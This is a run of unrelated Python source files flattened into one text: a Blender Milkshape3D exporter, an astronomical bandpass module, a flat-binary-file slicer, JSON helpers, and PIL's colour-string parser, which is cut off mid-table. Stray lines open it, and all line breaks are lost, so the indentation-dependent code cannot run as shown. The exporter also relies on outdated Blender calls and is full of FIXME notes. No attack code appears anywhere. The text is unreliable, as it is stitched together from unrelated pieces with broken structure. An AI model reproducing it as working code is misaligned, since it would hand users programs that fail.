1 value
15 values
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### # Copyright (C) 2004-2015: Paul Vint [email protected] """ This script exports Milkshape3d text files from Blender (http://www.blender.org). It supports face and vertex normals, colours, and texture coordinates per face or per vertex. Only one mesh can be exported at a time. """ import bpy import os DEBUG = True def getPrimaryVertexGroup(_vgroups, _v): g = -1 w = 0 ## Scan through any vertex groups and return the index of the one with the highest weight (or -1 if none) for vertgroup in _v.groups: if (vertgroup.weight > w): w = vertgroup.weight g = vertgroup.group #fw("xx%fxx" % vertgroup.group) return g def face_iter_func(mesh): uv_layer = mesh.uv_textures.active.data uv_layer_len = len(uv_layer) faces = mesh.faces for i in range(uv_layer_len): uv_elem = uv_layer[i] yield (i, uv_layer[i].uv) def save(operator, context, filepath="", use_modifiers=True, use_normals=True, use_uv_coords=True, use_colors=True, ): def rvec3d(v): return round(v[0], 6), round(v[1], 6), round(v[2], 6) def rvec2d(v): return round(v[0], 6), round(v[1], 6) scene = context.scene obj = context.active_object if not obj: raise Exception("Error, Select 1 active object") # Multiple meshes objects = context.selected_objects file = open(filepath, "w", encoding="utf8", newline="\n") fw = file.write fw("// Milkshape 3D ASCII\n\n") fw("Frames: 30\n") fw("Frame: 1\n\n") if scene.objects.active: bpy.ops.object.mode_set(mode='OBJECT') o = 0 numArmatures = 0 numMeshes = 0 # count the meshes for obj in objects: if obj.type == "MESH": numMeshes = numMeshes + 1 fw("Meshes: %d\n" % numMeshes) for obj in objects: ## Check if it's an armature if obj.type == "ARMATURE": numArmatures = numArmatures + 1 else: if use_modifiers: mesh = obj.to_mesh(scene, True, 'PREVIEW') else: mesh = obj.data if not mesh: raise Exception("Error, could not get mesh data from active object") # mesh.transform(obj.matrix_world) # XXX has_uv = (len(mesh.uv_textures) > 0) has_uv_vertex = (len(mesh.sticky) > 0) # FIXME #has_uv = True has_vcol = len(mesh.vertex_colors) > 0 #if (not has_uv) and (not has_uv_vertex): # use_uv_coords = False if not has_vcol: use_colors = False if not use_uv_coords: has_uv = has_uv_vertex = False if not use_colors: has_vcol = False if has_uv: active_uv_layer = mesh.uv_textures.active if not active_uv_layer: use_uv_coords = False has_uv = False else: active_uv_layer = active_uv_layer.data if False: # Testing for i, uv in face_iter_func(mesh): fw("%d %f \n" % (i, uv[0][0])) return True ## Get UV list if has_uv: faceUVs = [] for i, uv in face_iter_func(mesh): faceUVs.append(uv) if has_vcol: active_col_layer = mesh.vertex_colors.active if not active_col_layer: use_colors = False has_vcol = False else: active_col_layer = active_col_layer.data # in case color = uvcoord = uvcoord_key = normal = normal_key = None mesh_verts = mesh.vertices # save a lookup ply_verts = [] # list of dictionaries # vdict = {} # (index, normal, uv) -> new index vdict = [{} for i in range(len(mesh_verts))] ply_faces = [[] for f in range(len(mesh.faces))] vert_count = 0 ## Vertex Group Testing vGroups = [] vGroupsIndices = [] if (obj.vertex_groups): for x in obj.vertex_groups: #fw("=%d %s\n" % (x.index, x.name)) vGroups.append({x.index, x.name}) vGroupsIndices.append(x.index) ## Yielded: #0 Bone #1 Bone.002 #2 Bone.001 for i, f in enumerate(mesh.faces): # GOOD: fw("Verts: %d %d %d\n" % (f.vertices[0], f.vertices[1], f.vertices[2])) smooth = f.use_smooth if not smooth: normal = tuple(f.normal) normal_key = rvec3d(normal) if has_uv: uv = active_uv_layer[i] uv = uv.uv1, uv.uv2, uv.uv3, uv.uv4 # XXX - crufty :/ if has_vcol: col = active_col_layer[i] col = col.color1[:], col.color2[:], col.color3[:], col.color4[:] f_verts = f.vertices pf = ply_faces[i] ## FIXME Deprecated for j, vidx in enumerate(f_verts): v = mesh_verts[vidx] if smooth: normal = tuple(v.normal) normal_key = rvec3d(normal) if has_uv: uvcoord = uv[j][0], 1.0 - uv[j][1] uvcoord_key = rvec2d(uvcoord) elif has_uv_vertex: uvcoord = v.uvco[0], 1.0 - v.uvco[1] uvcoord_key = rvec2d(uvcoord) if has_vcol: color = col[j] color = (int(color[0] * 255.0), int(color[1] * 255.0), int(color[2] * 255.0), ) key = normal_key, uvcoord_key, color vdict_local = vdict[vidx] pf_vidx = vdict_local.get(key) # Will be None initially if pf_vidx is None: # same as vdict_local.has_key(key) pf_vidx = vdict_local[key] = vert_count ply_verts.append((vidx, normal, uvcoord, color)) vert_count += 1 pf.append(pf_vidx) # Mesh name, flags, material index fw("\"%s\" 0 %d\n" % (obj.name, o)) #fw("%d\n" % (len(mesh.faces) * 3)) #if use_colors: # fw("property uchar red\n" # "property uchar green\n" # "property uchar blue\n") #fw("element face %d\n" % len(mesh.faces)) #fw("property list uchar uint vertex_indices\n") #fw("end_header\n") # mesh.vertices is array of vertex coords # face.vertices is array of vertex indices # to get unique vertices in the file create an array of all vertices and # then find the highest index in the list of faces and use only up to # that one to only have unique vertices maxIndex = 0 numVerts = 0 for f in mesh.faces: for v in f.vertices: numVerts = numVerts + 1 if (v >= maxIndex): maxIndex = v maxIndex = maxIndex + 1 #fw("%d\n" % (maxIndex)) ## create array of verts vco = [] fverts = [] ## make a properly ordered list of vertices for f in mesh.faces: for v in mesh.vertices: fverts.append(v) ### The following method is crap - need to duplicate verts for when they have different ### UV coords for different faces! #for i in range(0, maxIndex): #fw("0 %.4f %.4f %.4f " % (-fverts[i].co[0], fverts[i].co[2], -fverts[i].co[1])) #fw('0.0, 0.0') # uv # Vertex Group #vg = getPrimaryVertexGroup(vGroups, fverts[i]) #fw(" %d\n" % vg) ## Prep for UVs activeUV = mesh.uv_textures[0].data #if has_uv: # actuveUV = mesh.uv_textures ### Dump each vert on each face fw("%d\n" % numVerts) fIdx = 0 for f in mesh.faces: if (len(f.vertices) != 3): raise Exception("Error! All faces must be triangles. (Convert in edit mode by pressing CTRL-t)") ## Loop through each vertex in the face vIdx = 0 uv = activeUV[fIdx] fuv = uv.uv1, uv.uv2, uv.uv3 for v in f.vertices: fw("0 %.4f %.4f %.4f " % (-fverts[v].co[0], fverts[v].co[2], -fverts[v].co[1])) ## uv coords #for i, uv in face_iter_func(mesh): #fw("%d %f \n" % (i, uv[0][0])) if has_uv: fw("%.4f %.4f " % (faceUVs[fIdx][vIdx][0], 1.0 - faceUVs[fIdx][vIdx][1])) #fw("%.4f %.4f " % (fverts[v].uv[0], 1 - fverts[v].uv[1])) else: fw("0.0000 0.0000 "); ## Vertex Group if not obj.vertex_groups: vg = -1 else: vg = getPrimaryVertexGroup(vGroups, fverts[v]) fw("%d\n" % vg) vIdx = vIdx + 1 fIdx = fIdx + 1 # Repeat the above loop to get vertex normals fw("%d\n" % numVerts) for f in mesh.faces: ## Test if using smoothing or not if f.use_smooth: ## Loop through each vertex in the face for v in f.vertices: fw("%.4f %.4f %.4f\n" % (-fverts[v].normal[0], fverts[v].normal[2], -fverts[v].normal[1])) else: for v in f.vertices: fw("%.4f %.4f %.4f\n" % (-f.normal[0], f.normal[2], -f.normal[1])) # Get Face info # TODO: Smoothing groups # A bit BFI, but vertices are in order fw("%d\n" % len(ply_faces)) v = 0 for f in mesh.faces: fw("1 %d %d %d" % (v + 2, v + 1, v)) fw(" %d %d %d 1\n" % (v + 2, v + 1, v)) v = v + 3 o = o + 1 ## Materials # Note: Limiting to one mat per mesh, and assuming every mesh has one world = scene.world if world: world_amb = world.ambient_color else: world_amb = Color((0.0, 0.0, 0.0)) fw("\nMaterials: %d\n" % o) o = 0 for obj in objects: if obj.type != "ARMATURE": materials = obj.data.materials[:] mat = materials[0] fw("\"Mat%d\"\n" % o) ## ambient fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.ambient)[:]) ## Diffues fw("%.6f %.6f %.6f 1.000000\n" % (mat.diffuse_intensity * mat.diffuse_color)[:]) fw("%.6f %.6f %.6f 1.000000\n" % (mat.specular_intensity * mat.specular_color)[:]) # Specular fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.emit)[:]) fw("%.6f\n" % mat.specular_hardness) fw("%.6f\n" % mat.alpha) if (len(obj.data.uv_textures) > 0): uv_layer = obj.data.uv_textures.active.data[:] uv_image = uv_layer[0].image if (uv_image): fw("\"%s\"\n" % uv_image.filepath) else: fw("\"\"\n") else: fw("\"\"\n") # TODO: Alpha texture fw("\"\"\n") o = o + 1 fw("\n") #fw("Bones: %d\n" % numArmatures) numBones = 0 # count the bones for obj in objects: if obj.type == "ARMATURE": for b in obj.pose.bones: numBones = numBones + 1 fw("Bones: %d\n" % numBones) # export the bones for obj in objects: if obj.type == "ARMATURE": for b in obj.pose.bones: ## Give the file the bone! ## Bone Name fw("\"%s\"\n" % b.name) ## Parent Name if (len(b.parent_recursive) > 0 ): fw("\"%s\"\n" % b.parent.name) else: fw("\"\"\n") ## // joint: flags, posx, posy, posz, rotx, roty, rotz ## Looking at examples the flag appears to always be 24 (?) ## Not sure how to get rot - skip it for now fw("24 %.6f %.6f %.6f 0 0 0\n" % ( -b.head[0], b.head[2], -b.head[1])) ## Number of position keys - using the number of frames in the anim sequence fw("%d\n" % (scene.frame_end - scene.frame_start)) ## FIXME Not sure how to handle time, just doing 1 sec per frame for now secs = 1 ## // position key: time, posx, posy, posz for frame in range(scene.frame_start, scene.frame_end): ## Go to the first frame scene.frame_set(frame) fw("%.6f %.6f %.6f %.6f\n" % ( secs, -b.tail[0], b.tail[2], -b.tail[1])) secs = secs + 1 ### Rotation Keys # Just using number of frames for now with rots all 0.0 fw("%d\n" % (scene.frame_end - scene.frame_start)) for frame in range(scene.frame_start, scene.frame_end): fw("%d 0.000000 0.000000 0.000000\n" % secs) ## End of this bone fw("\n") fw("GroupComments: 0\n") fw("MaterialComments: 0\n") fw("BoneComments: 0\n") fw("ModelComment: 0\n") file.close() print("writing %r done" % filepath) if use_modifiers: bpy.data.meshes.remove(mesh) # XXX """ if is_editmode: Blender.Window.EditMode(1, "", 0) """ return {'FINISHED'}
# Licensed under a 3-clause BSD style license - see LICENSE.rst import copy import astropy.units as u import numpy as np from astropy.io import ascii from astropy.utils import lazyproperty from scipy.interpolate import splev, splrep from ._registry import Registry from .constants import HC_ERG_AA, SPECTRUM_BANDFLUX_SPACING from .utils import integration_grid __all__ = ['get_bandpass', 'read_bandpass', 'Bandpass', 'AggregateBandpass', 'BandpassInterpolator'] _BANDPASSES = Registry() _BANDPASS_INTERPOLATORS = Registry() def get_bandpass(name, *args): """Get a Bandpass from the registry by name.""" if isinstance(name, Bandpass): return name if len(args) == 0: return _BANDPASSES.retrieve(name) else: interp = _BANDPASS_INTERPOLATORS.retrieve(name) return interp.at(*args) def read_bandpass(fname, fmt='ascii', wave_unit=u.AA, trans_unit=u.dimensionless_unscaled, normalize=False, trim_level=None, name=None): """Read bandpass from two-column ASCII file containing wavelength and transmission in each line. Parameters ---------- fname : str File name. fmt : {'ascii'} File format of file. Currently only ASCII file supported. wave_unit : `~astropy.units.Unit` or str, optional Wavelength unit. Default is Angstroms. trans_unit : `~astropy.units.Unit`, optional Transmission unit. Can be `~astropy.units.dimensionless_unscaled`, indicating a ratio of transmitted to incident photons, or units proportional to inverse energy, indicating a ratio of transmitted photons to incident energy. Default is ratio of transmitted to incident photons. normalize : bool, optional If True, normalize fractional transmission to be 1.0 at peak. It is recommended to set to True if transmission is in units of inverse energy. (When transmission is given in these units, the absolute value is usually not significant; normalizing gives more reasonable transmission values.) Default is False. name : str, optional Identifier. Default is `None`. Returns ------- band : `~sncosmo.Bandpass` """ if fmt != 'ascii': raise ValueError("format {0} not supported. Supported formats: 'ascii'" .format(fmt)) t = ascii.read(fname, names=['wave', 'trans']) return Bandpass(t['wave'], t['trans'], wave_unit=wave_unit, trans_unit=trans_unit, normalize=normalize, trim_level=trim_level, name=name) def slice_exclude_below(a, minvalue, grow=1): """Contiguous range in 1-d array `a` that excludes values less than `minvalue`. Range is expanded by `grow` in each direction.""" idx = np.flatnonzero(a >= minvalue) i0 = max(idx[0] - grow, 0) i1 = min(idx[-1] + 1 + grow, len(a)) # exclusive return slice(i0, i1) class Bandpass(object): """Transmission as a function of spectral wavelength. Parameters ---------- wave : list_like Wavelength. Monotonically increasing values. trans : list_like Transmission fraction. wave_unit : `~astropy.units.Unit` or str, optional Wavelength unit. Default is Angstroms. trans_unit : `~astropy.units.Unit`, optional Transmission unit. Can be `~astropy.units.dimensionless_unscaled`, indicating a ratio of transmitted to incident photons, or units proportional to inverse energy, indicating a ratio of transmitted photons to incident energy. Default is ratio of transmitted to incident photons. normalize : bool, optional If True, normalize fractional transmission to be 1.0 at peak. It is recommended to set normalize=True if transmission is in units of inverse energy. (When transmission is given in these units, the absolute value is usually not significant; normalizing gives more reasonable transmission values.) Default is False. trim_level : float, optional If given, crop bandpass to region where transmission is above this fraction of the maximum transmission. For example, if maximum transmission is 0.5, ``trim_level=0.001`` will remove regions where transmission is below 0.0005. Only contiguous regions on the sides of the bandpass are removed. name : str, optional Identifier. Default is `None`. Examples -------- Construct a Bandpass and access the input arrays: >>> b = Bandpass([4000., 4200., 4400.], [0.5, 1.0, 0.5]) >>> b.wave array([ 4000., 4200., 4400.]) >>> b.trans array([ 0.5, 1. , 0.5]) Bandpasses act like continuous 1-d functions (linear interpolation is used): >>> b([4100., 4300.]) array([ 0.75, 0.75]) The effective (transmission-weighted) wavelength is a property: >>> b.wave_eff 4200.0 The ``trim_level`` keyword can be used to remove "out-of-band" transmission upon construction. The following example removes regions of the bandpass with tranmission less than 1 percent of peak: >>> band = Bandpass([4000., 4100., 4200., 4300., 4400., 4500.], ... [0.001, 0.002, 0.5, 0.6, 0.003, 0.001], ... trim_level=0.01) >>> band.wave array([ 4100., 4200., 4300., 4400.]) >>> band.trans array([ 0.002, 0.5 , 0.6 , 0.003]) While less strictly correct than including the "out-of-band" transmission, only considering the region of the bandpass where transmission is significant can improve model-bandpass overlap as well as performance. """ def __init__(self, wave, trans, wave_unit=u.AA, trans_unit=u.dimensionless_unscaled, normalize=False, name=None, trim_level=None): wave = np.asarray(wave, dtype=np.float64) trans = np.asarray(trans, dtype=np.float64) if wave.shape != trans.shape: raise ValueError('shape of wave and trans must match') if wave.ndim != 1: raise ValueError('only 1-d arrays supported') # Ensure that units are actually units and not quantities, so that # `to` method returns a float and not a Quantity. wave_unit = u.Unit(wave_unit) trans_unit = u.Unit(trans_unit) if wave_unit != u.AA: wave = wave_unit.to(u.AA, wave, u.spectral()) # If transmission is in units of inverse energy, convert to # unitless transmission: # # (transmitted photons / incident photons) = # (photon energy) * (transmitted photons / incident energy) # # where photon energy = h * c / lambda if trans_unit != u.dimensionless_unscaled: trans = (HC_ERG_AA / wave) * trans_unit.to(u.erg**-1, trans) # Check that values are monotonically increasing. # We could sort them, but if this happens, it is more likely a user # error or faulty bandpass definition. So we leave it to the user to # sort them. if not np.all(np.ediff1d(wave) > 0.): raise ValueError('bandpass wavelength values must be monotonically' ' increasing when supplied in wavelength or ' 'decreasing when supplied in energy/frequency.') if normalize: trans /= np.max(trans) # Trim "out-of-band" transmission if trim_level is not None: s = slice_exclude_below(trans, np.max(trans) * trim_level, grow=1) wave = wave[s] trans = trans[s] # if more than one leading or trailing transmissions are zero, we # can remove them. if ((trans[0] == 0.0 and trans[1] == 0.0) or (trans[-1] == 0.0 and trans[-2] == 0.0)): i = 0 while i < len(trans) and trans[i] == 0.0: i += 1 if i == len(trans): raise ValueError('all zero transmission') j = len(trans) - 1 while j >= 0 and trans[j] == 0.0: j -= 1 # back out to include a single zero if i > 0: i -= 1 if j < len(trans) - 1: j += 1 wave = wave[i:j+1] trans = trans[i:j+1] self.wave = wave self.trans = trans # Set up interpolation. # This appears to be the fastest-evaluating interpolant in # scipy.interpolate. self._tck = splrep(self.wave, self.trans, k=1) self.name = name def minwave(self): return self.wave[0] def maxwave(self): return self.wave[-1] @lazyproperty def wave_eff(self): """Effective wavelength of bandpass in Angstroms.""" wave, _ = integration_grid(self.minwave(), self.maxwave(), SPECTRUM_BANDFLUX_SPACING) weights = self(wave) return np.sum(wave * weights) / np.sum(weights) def __call__(self, wave): return splev(wave, self._tck, ext=1) def __repr__(self): name = '' if self.name is not None: name = ' {!r}'.format(self.name) return "<{:s}{:s} at 0x{:x}>".format(self.__class__.__name__, name, id(self)) def shifted(self, factor, name=None): """Return a new Bandpass instance with all wavelengths multiplied by a factor.""" return Bandpass(factor * self.wave, self.trans, name=name) class _SampledFunction(object): """Represents a 1-d continuous function, used in AggregateBandpass.""" def __init__(self, x, y): self.x = np.asarray(x, dtype=np.float64) self.y = np.asarray(y, dtype=np.float64) self.xmin = x[0] self.xmax = x[-1] self._tck = splrep(self.x, self.y, k=1) def __call__(self, x): return splev(x, self._tck, ext=1) class AggregateBandpass(Bandpass): """Bandpass defined by multiple transmissions in series. Parameters ---------- transmissions : list of (wave, trans) pairs. Functions defining component transmissions. prefactor : float, optional Scalar factor to multiply transmissions by. Default is 1.0. name : str, optional Name of bandpass. family : str, optional Name of "family" this bandpass belongs to. Such an identifier can be useful for identifying bandpasses belonging to the same instrument/filter combination but different focal plane positions. """ def __init__(self, transmissions, prefactor=1.0, name=None, family=None): if len(transmissions) < 1: raise ValueError("empty list of transmissions") # Set up transmissions as `_SampledFunction`s. # # We allow passing `_SampledFunction`s directly to allow # RadialBandpassGenerator to generate AggregateBandpasses a # bit more efficiently, even though _SampledFunction isn't # part of the public API. self.transmissions = [t if isinstance(t, _SampledFunction) else _SampledFunction(t[0], t[1]) for t in transmissions] self.prefactor = prefactor self.name = name self.family = family # Determine min/max wave: since sampled functions are zero outside # their domain, minwave is the *largest* minimum x value, and # vice-versa for maxwave. self._minwave = max(t.xmin for t in self.transmissions) self._maxwave = min(t.xmax for t in self.transmissions) def minwave(self): return self._minwave def maxwave(self): return self._maxwave def __str__(self): return ("AggregateBandpass: {:d} components, prefactor={!r}, " "range=({!r}, {!r}), name={!r}" .format(len(self.transmissions), self.prefactor, self.minwave(), self.maxwave(), self.name)) def __call__(self, wave): t = self.transmissions[0](wave) for trans in self.transmissions[1:]: t *= trans(wave) t *= self.prefactor return t def shifted(self, factor, name=None, family=None): """Return a new AggregateBandpass instance with all wavelengths multiplied by a factor.""" transmissions = [(factor * t.x, t.y) for t in self.transmissions] return AggregateBandpass(transmissions, prefactor=self.prefactor, name=name, family=family) class BandpassInterpolator(object): """Bandpass generator defined as a function of focal plane position. Instances of this class are not Bandpasses themselves, but generate Bandpasses at a given focal plane position. This class stores the transmission as a function of focal plane position and interpolates between the defined positions to return the bandpass at an arbitrary position. Parameters ---------- transmissions : list of (wave, trans) pairs Transmissions that apply everywhere in the focal plane. dependent_transmissions : list of (value, wave, trans) Transmissions that depend on some parameter. Each `value` is the scalar parameter value, `wave` and `trans` are 1-d arrays. prefactor : float, optional Scalar multiplying factor. name : str Examples -------- Transmission uniform across focal plane: >>> uniform_trans = ([4000., 5000.], [1., 0.5]) # wave, trans Transmissions as a function of radius: >>> trans0 = (0., [4000., 5000.], [0.5, 0.5]) # radius=0 >>> trans1 = (1., [4000., 5000.], [0.75, 0.75]) # radius=1 >>> trans2 = (2., [4000., 5000.], [0.1, 0.1]) # radius=2 >>> band_interp = BandpassInterpolator([uniform_trans], ... [trans0, trans1, trans2], ... name='my_band') Min and max radius: >>> band_interp.minpos(), band_interp.maxpos() (0.0, 2.0) Get bandpass at a given radius: >>> band = band_interp.at(1.5) >>> band <AggregateBandpass 'my_band at 1.500000' at 0x7f7a2e425668> The band is aggregate of uniform transmission part, and interpolated radial-dependent part. >>> band([4500., 4600.]) array([ 0.65625, 0.6125 ]) """ def __init__(self, transmissions, dependent_transmissions, prefactor=1.0, name=None): # create sampled functions for normal transmissions self.transmissions = [_SampledFunction(t[0], t[1]) for t in transmissions] # ensure dependent transmissions are sorted sorted_trans = sorted(dependent_transmissions, key=lambda x: x[0]) self.dependent_transmissions = [(t[0], _SampledFunction(t[1], t[2])) for t in sorted_trans] self.prefactor = prefactor self.name = name def minpos(self): """Minimum positional parameter value.""" return self.dependent_transmissions[0][0] def maxpos(self): """Maximum positional parameter value.""" return self.dependent_transmissions[-1][0] def at(self, pos): """Return the bandpass at the given position""" if pos < self.minpos() or pos >= self.maxpos(): raise ValueError("Position outside bounds") # find index such that t[i-1] <= pos < t[i] i = 1 while (i < len(self.dependent_transmissions) and pos > self.dependent_transmissions[i][0]): i += 1 # linearly interpolate second transmission onto first v0, f0 = self.dependent_transmissions[i-1] v1, f1 = self.dependent_transmissions[i] w1 = (pos - v0) / (v1 - v0) w0 = 1.0 - w1 x = f0.x y = w0 * f0.y + w1 * f1(x) f = _SampledFunction(x, y) transmissions = copy.copy(self.transmissions) # shallow copy the list transmissions.append(f) name = "" if self.name is None else (self.name + " ") name += "at {:f}".format(pos) return AggregateBandpass(transmissions, prefactor=self.prefactor, name=name, family=self.name)
#!/usr/bin/env python from . import memfbf from numpy import append import os import logging from glob import glob LOG = logging.getLogger(__name__) class SlicerFrame(dict): pass class FBFSlicer(object): """Given a workspace directory of flat binary files, grab all useful filenames and return a record of data at a time as a python dictionary. """ def __init__(self, work_dir, buffer_size=0, filename_filter=None): """Initialize slicer object parameters. :param work_dir: Workspace directory of flat binary files to read :param buffer_size: Circular buffer size or 0 for non-circular buffers/FBFs :param filename_filter: Filter function that returns True if the provided file should be opened for reading. Should return False otherwise. """ self._wd = work_dir self._buffer_size = buffer_size self._open_files = dict() if filename_filter is None: filename_filter = lambda filename: True self.should_include = filename_filter def _update_open_files(self): for fn in glob(os.path.join(self._wd, '*')): if fn not in self._open_files and self.should_include(os.path.split(fn)[-1]): LOG.debug('opening %s' % fn) try: nfo = memfbf.FBF(fn) except Exception as oops: nfo = None LOG.info('%s could not be opened as FBF' % fn) LOG.debug(repr(oops)) LOG.debug('found new file %s' % fn) self._open_files[fn] = nfo def __call__(self, first_record, last_record=None): """Retrieve a slice of a FBF directory using inclusive 1-based record number range, noting that last-first+1 records are returned. """ last_record = first_record if last_record is None else last_record if not self._open_files: self._update_open_files() data = SlicerFrame() for name, nfo in self._open_files.items(): if nfo is not None: # note we use % in order to deal with # wavenumber files that are only ever 1 record long # circular buffers which are fixed length files file_len = nfo.length() # check for non-circular buffer case and going off the end of the file # note use of > since record numbers are 1-based if (self._buffer_size == 0) and (file_len != 1) and (first_record > file_len or last_record > file_len): LOG.warning('%s: length is %d but start-end is %d-%d' % (name, file_len, first_record, last_record)) return None # check for circular buffers that aren't preallocated properly if self._buffer_size > 0 and file_len not in (1, self._buffer_size): LOG.info('buffer file %s size mismatch (%d != %d)! ignoring' % (name, file_len, self._buffer_size)) else: # 0-based circular buffer first_index = (first_record - 1) % file_len last_index = (last_record - 1) % file_len if last_index >= first_index: # Records are in one continuous line idx = slice(first_index, last_index + 1) # +1 to include last item data[nfo.stemname] = nfo[idx] else: # Records are on two ends of the circular buffer idx1 = slice(first_index, self._buffer_size) idx2 = slice(0, last_index + 1) # +1 to include last item arr1 = nfo[idx1] arr2 = nfo[idx2] data[nfo.stemname] = append(arr1, arr2, axis=0) return data
import json def jsonSave(data, fileName, indent=True, sort=False, oneLine=False): f = open(fileName, 'w') if indent: f.write(json.dumps(data, indent=4, sort_keys=sort)) else: f.write(json.dumps(data, sort_keys=sort)) f.close() def jsonLoad(fileName): try: file = open(fileName) t=file.read() file.close() return json.loads(t) except: return {}
# # The Python Imaging Library # $Id$ # # map CSS3-style colour description strings to RGB # # History: # 2002-10-24 fl Added support for CSS-style color strings # 2002-12-15 fl Added RGBA support # 2004-03-27 fl Fixed remaining int() problems for Python 1.5.2 # 2004-07-19 fl Fixed gray/grey spelling issues # 2009-03-05 fl Fixed rounding error in grayscale calculation # # Copyright (c) 2002-2004 by Secret Labs AB # Copyright (c) 2002-2004 by Fredrik Lundh # # See the README file for information on usage and redistribution. # from PIL import Image import re ## # Convert color string to RGB tuple. # # @param color A CSS3-style colour string. # @return An RGB-tuple. # @exception ValueError If the color string could not be interpreted # as an RGB value. def getrgb(color): """ Convert a color string to an RGB tuple. If the string cannot be parsed, this function raises a :py:exc:`ValueError` exception. .. versionadded:: 1.1.4 :param color: A color string :return: ``(red, green, blue)`` """ try: rgb = colormap[color] except KeyError: try: # fall back on case-insensitive lookup rgb = colormap[color.lower()] except KeyError: rgb = None # found color in cache if rgb: if isinstance(rgb, tuple): return rgb colormap[color] = rgb = getrgb(rgb) return rgb # check for known string formats m = re.match("#\w\w\w$", color) if m: return ( int(color[1]*2, 16), int(color[2]*2, 16), int(color[3]*2, 16) ) m = re.match("#\w\w\w\w\w\w$", color) if m: return ( int(color[1:3], 16), int(color[3:5], 16), int(color[5:7], 16) ) m = re.match("rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color) if m: return ( int(m.group(1)), int(m.group(2)), int(m.group(3)) ) m = re.match("rgb\(\s*(\d+)%\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color) if m: return ( int((int(m.group(1)) * 255) / 100.0 + 0.5), int((int(m.group(2)) * 255) / 100.0 + 0.5), int((int(m.group(3)) * 255) / 100.0 + 0.5) ) m = re.match("hsl\(\s*(\d+)\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color) if m: from colorsys import hls_to_rgb rgb = hls_to_rgb( float(m.group(1)) / 360.0, float(m.group(3)) / 100.0, float(m.group(2)) / 100.0, ) return ( int(rgb[0] * 255 + 0.5), int(rgb[1] * 255 + 0.5), int(rgb[2] * 255 + 0.5) ) m = re.match("rgba\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color) if m: return ( int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4)) ) raise ValueError("unknown color specifier: %r" % color) def getcolor(color, mode): """ Same as :py:func:`~PIL.ImageColor.getrgb`, but converts the RGB value to a greyscale value if the mode is not color or a palette image. If the string cannot be parsed, this function raises a :py:exc:`ValueError` exception. .. versionadded:: 1.1.4 :param color: A color string :return: ``(red, green, blue)`` """ # same as getrgb, but converts the result to the given mode color = getrgb(color) if mode == "RGB": return color if mode == "RGBA": if len(color) == 3: color = (color + (255,)) r, g, b, a = color return r, g, b, a if Image.getmodebase(mode) == "L": r, g, b = color return (r*299 + g*587 + b*114)//1000 return color colormap = { # X11 colour table (from "CSS3 module: Color working draft"), with # gray/grey spelling issues fixed. This is a superset of HTML 4.0 # colour names used in CSS 1. "aliceblue": "#f0f8ff", "antiquewhite": "#faebd7", "aqua": "#00ffff", "aquamarine": "#7fffd4", "azure": "#f0ffff", "beige": "#f5f5dc", "bisque": "#ffe4c4", "black": "#000000", "blanchedalmond": "#ffebcd", "blue": "#0000ff", "blueviolet": "#8a2be2", "brown": "#a52a2a", "burlywood": "#deb887", "cadetblue": "#5f9ea0", "chartreuse": "#7fff00", "chocolate": "#d2691e", "coral": "#ff7f50", "cornflowerblue": "#6495ed", "cornsilk": "#fff8dc", "crimson": "#dc143c", "cyan": "#00ffff", "darkblue": "#00008b", "darkcyan": "#008b8b", "darkgoldenrod": "#b8860b", "darkgray": "#a9a9a9", "darkgrey": "#a9a9a9", "darkgreen": "#006400", "darkkhaki": "#bdb76b", "darkmagenta": "#8b008b", "darkolivegreen": "#556b2f", "darkorange": "#ff8c00", "darkorchid": "#9932cc", "darkred": "#8b0000", "darksalmon": "#e9967a", "darkseagreen": "#8fbc8f", "darkslateblue": "#483d8b", "darkslategray": "#2f4f4f", "darkslategrey": "#2f4f4f", "darkturquoise": "#00ced1", "darkviolet": "#9400d3", "deeppink": "#ff1493", "deepskyblue": "#00bfff", "dimgray": "#696969", "dimgrey": "#696969", "dodgerblue": "#1e90ff", "firebrick": "#b22222", "floralwhite": "#fffaf0", "forestgreen": "#228b22", "fuchsia": "#ff00ff", "gainsboro": "#dcdcdc", "ghostwhite": "#f8f8ff", "gold": "#ffd700", "goldenrod": "#daa520", "gray": "#808080", "grey": "#808080", "green": "#008000", "greenyellow": "#adff2f", "honeydew": "#f0fff0", "hotpink": "#ff69b4", "indianred": "#cd5c5c", "indigo": "#4b0082", "ivory": "#fffff0", "khaki": "#f0e68c", "lavender": "#e6e6fa", "lavenderblush": "#fff0f5", "lawngreen": "#7cfc00", "lemonchiffon": "#fffacd", "lightblue": "#add8e6", "lightcoral": "#f08080", "lightcyan": "#e0ffff", "lightgoldenrodyellow": "#fafad2", "lightgreen": "#90ee90", "lightgray": "#d3d3d3", "lightgrey": "#d3d3d3", "lightpink": "#ffb6c1", "lightsalmon": "#ffa07a", "lightseagreen": "#20b2aa", "lightskyblue": "#87cefa", "lightslategray": "#778899", "lightslategrey": "#778899", "lightsteelblue": "#b0c4de", "lightyellow": "#ffffe0", "lime": "#00ff00", "limegreen": "#32cd32", "linen": "#faf0e6", "magenta": "#ff00ff", "maroon": "#800000", "mediumaquamarine": "#66cdaa", "mediumblue": "#0000cd", "mediumorchid": "#ba55d3", "mediumpurple": "#9370db", "mediumseagreen": "#3cb371", "mediumslateblue": "#7b68ee", "mediumspringgreen": "#00fa9a", "mediumturquoise": "#48d1cc", "mediumvioletred": "#c71585", "midnightblue": "#191970", "mintcream": "#f5fffa", "mistyrose": "#ffe4e1", "moccasin": "#ffe4b5", "navajowhite": "#ffdead", "navy": "#000080", "oldlace": "#fdf5e6", "olive": "#808000", "olivedrab": "#6b8e23", "orange": "#ffa500", "orangered": "#ff4500", "orchid": "#da70d6", "palegoldenrod": 